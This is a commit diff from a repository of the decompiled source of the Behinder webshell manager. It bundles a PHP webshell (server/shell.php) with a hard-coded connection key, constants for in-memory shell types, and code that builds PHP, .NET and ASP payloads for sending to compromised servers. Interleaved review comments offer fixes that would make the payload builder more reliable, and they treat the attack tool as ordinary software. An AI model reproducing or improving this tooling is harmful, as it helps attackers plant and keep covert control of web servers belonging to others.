更新至V3.0 Beta7,并且修复原版“虚拟终端”无法输入命令的问题
zhanghaishan committed Apr 11, 2021
1 parent 73b2179 commit ca51c4e
Showing 518 changed files with 5,359 additions and 914 deletions.
6 changes: 6 additions & 0 deletions README.md
@@ -1,6 +1,11 @@
# 冰蝎客户端源码
首先致敬作者rebeyond:https://github.com/rebeyond/Behinder/releases

# 更新内容
```
2021-04-11 逆向V3.0 Beta7 并且修复原版虚拟终端无法输入命令问题
```

# 郑重声明
拿刀的不一定是屠夫,也有可能是伙夫,当然也有可能是大夫,本代码仅供学习,请保证必须一定勿用于非法用途!!!

Expand All @@ -11,6 +16,7 @@

3.server目录下是服务端小马程序。


# 分支
本git的分支对标原版程序版本号。

4 changes: 4 additions & 0 deletions pom.xml
Expand Up @@ -136,6 +136,10 @@
<include>**/*.gif</include>
<include>**/*.asp</include>
<include>**/*.php</include>
<include>**/*.jar</include>
<include>**/*.32</include>
<include>**/*.64</include>
<include>**/*.bak</include>
</includes>
<filtering>true</filtering>
</resource>
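Review bot: The `**/*.jar`, `**/*.32` and `**/*.64` patterns sit in a `<resource>` with `<filtering>true</filtering>`, so Maven's resource filtering runs over binary content and can corrupt it while substituting `${...}` tokens. Binary files should go into a second `<resource>` entry for the same directory with `<filtering>false</filtering>`, leaving only text templates in the filtered one. These are also opaque binaries bundled with no checksum or provenance recorded in the visible change, which makes the built artifact hard to audit. The `<resource>` element opens outside the hunk, so its `<directory>` is not visible here.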
1 change: 1 addition & 0 deletions server/shell.php
Expand Up @@ -3,6 +3,7 @@
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
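Review bot: The `session_write_close();` call, which appears to be the one added line, has no comment saying why the session is closed right after `$_SESSION['k']` is set. A one-line comment such as `// release the session lock before the request body is read` would record the intent; that reading is inferred from PHP holding the session lock until the session is closed. The hard-coded `$key` two lines above is unchanged by this commit, so it remains the value derived from the default password named in its comment. That fixed string in a PHP file under a web root is a stable indicator for file-integrity and content scans. The script continues outside the hunk.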
17 changes: 16 additions & 1 deletion src/main/java/net/rebeyond/behinder/core/Constants.java
Expand Up @@ -2,7 +2,7 @@

public class Constants {
public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", 
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
public static String VERSION = "v3.0 Beta 6 ";
public static String VERSION = "v3.0 Beta 7 ";
public static int MENU_CUT = 1;
public static int MENU_COPY = 16;
public static int MENU_PASTE = 256;
Expand All @@ -27,5 +27,20 @@ public class Constants {
public static int PLUGIN_TYPE_EXPLOIT = 1;
public static int PLUGIN_TYPE_TOOL = 2;
public static int PLUGIN_TYPE_OTHER = 3;
public static int OS_TYPE_WINDOWS = 0;
public static int OS_TYPE_LINUX = 1;
public static int OS_TYPE_UNIX = 2;
public static int OS_TYPE_MAC = 3;
public static int HISTORY_DIRECTION_UP = 0;
public static int HISTORY_DIRECTION_DOWN = 1;
public static int SHELL_STATUS_ALIVE = 0;
public static int SHELL_STATUS_DEAD = 1;
public static int LIST_STAGE_STARTED = 0;
public static int LIST_STAGE_DONE = 1;
public static int LIST_STAGE_FAIL = 2;
public static int MEMSHELL_TYPE_FILE = 0;
public static int MEMSHELL_TYPE_AGENT = 1;
public static int MEMSHELL_TYPE_FILTER = 2;
public static int MEMSHELL_TYPE_SERVLET = 3;
public static String[] cookieProperty = new String[]{"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"};
}
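Review bot: The new `OS_TYPE_*`, `HISTORY_DIRECTION_*`, `SHELL_STATUS_*`, `LIST_STAGE_*` and `MEMSHELL_TYPE_*` fields are declared `public static int` without `final`, so any class can reassign them at runtime. Values from different groups are also interchangeable: `OS_TYPE_LINUX`, `HISTORY_DIRECTION_DOWN` and `SHELL_STATUS_DEAD` are all 1. Declare them as `public static final int OS_TYPE_WINDOWS = 0;`, or replace each group with an enum so the compiler rejects a mix-up. The same applies to `VERSION` and the existing `PLUGIN_TYPE_*` fields, and none of the groups carries a comment saying what it describes.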
39 changes: 33 additions & 6 deletions src/main/java/net/rebeyond/behinder/core/Params.java
Expand Up @@ -3,8 +3,12 @@
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.rebeyond.behinder.utils.ReplacingInputStream;
import net.rebeyond.behinder.utils.Utils;
import org.objectweb.asm.ClassAdapter;
Expand Down Expand Up @@ -62,7 +66,7 @@ public static byte[] getParamedAssembly(String clsName, Map params) throws Excep
String paramValue;
for(Iterator var6 = params.keySet().iterator(); var6.hasNext(); paramsStr = paramsStr + paramName + ":" + paramValue + ",") {
paramName = (String)var6.next();
paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes());
paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes("UTF-8"));
}

paramsStr = paramsStr.substring(0, paramsStr.length() - 1);
Expand Down Expand Up @@ -117,19 +121,42 @@ public static byte[] getParamedPhp(String clsName, Map params) throws Exception
bis.close();
code.append(bos.toString());
String paraList = "";
Iterator var9 = getPhpParams(code.toString()).iterator();

String paraName;
for(Iterator var9 = params.keySet().iterator(); var9.hasNext(); paraList = paraList + ",$" + paraName) {
paraName = (String)var9.next();
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
while(var9.hasNext()) {
String paraName = (String)var9.next();
if (params.keySet().contains(paraName)) {
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
paraList = paraList + ",$" + paraName;
} else {
code.append(String.format("$%s=\"%s\";", paraName, ""));
paraList = paraList + ",$" + paraName;
}
}

paraList = paraList.replaceFirst(",", "");
code.append("\r\nmain(" + paraList + ");");
return code.toString().getBytes();
}

public static List getPhpParams(String phpPayload) {
List paramList = new ArrayList();
Pattern mainPattern = Pattern.compile("main\\s*\\([^\\)]*\\)");
Matcher mainMatch = mainPattern.matcher(phpPayload);
if (mainMatch.find()) {
String mainStr = mainMatch.group(0);
Pattern paramPattern = Pattern.compile("\\$([a-zA-Z]*)");
Matcher paramMatch = paramPattern.matcher(mainStr);

while(paramMatch.find()) {
paramList.add(paramMatch.group(1));
}
}

return paramList;
}

public static byte[] getParamedAsp(String clsName, Map params) throws Exception {
String basePath = "net/rebeyond/behinder/payload/asp/";
String payloadPath = basePath + clsName + ".asp";
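Review bot: `getParamedPhp` still ends with `return code.toString().getBytes();` and decodes the template with `bos.toString()`, both on the platform default charset, while this commit switches `getParamedAssembly` to `getBytes("UTF-8")`. The two should agree, e.g. `return code.toString().getBytes("UTF-8");`. In the new `getPhpParams`, `\\$([a-zA-Z]*)` stops at the first digit or underscore and also matches a bare `$` as an empty name, so a parameter such as `$arg_1` (constructed example) would be emitted under a truncated name; `\\$([a-zA-Z_][a-zA-Z0-9_]*)` covers ASCII PHP identifiers. The `if`/`else` in the loop differs only in the value it formats and could be collapsed, and the raw `List`/`Iterator` could be `List<String>`/`Iterator<String>`. `getParamedAsp` continues outside the hunk.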
3 changes: 0 additions & 3 deletions src/main/java/net/rebeyond/behinder/core/PluginTools.java
Expand Up @@ -53,7 +53,6 @@ public void sendTask(String pluginName, String paramStr) throws Exception {
this.statusLabel.setText(msg);
});
} catch (Exception var7) {
var7.printStackTrace();
Platform.runLater(() -> {
this.statusLabel.setText("插件运行失败");
});
Expand All @@ -80,7 +79,6 @@ public void sendTaskBackground(String pluginName, Map params, PluginSubmitCallBa
String msg = resultObj.getString("msg");
callBack.onPluginSubmit(status, msg);
} catch (Exception var8) {
var8.printStackTrace();
callBack.onPluginSubmit("fail", var8.getMessage());
}

Expand Down Expand Up @@ -125,7 +123,6 @@ public void getTaskResult(String pluginName) {

});
} catch (Exception var8) {
var8.printStackTrace();
Platform.runLater(() -> {
this.statusLabel.setText("结果刷新失败:" + var8.getMessage());
});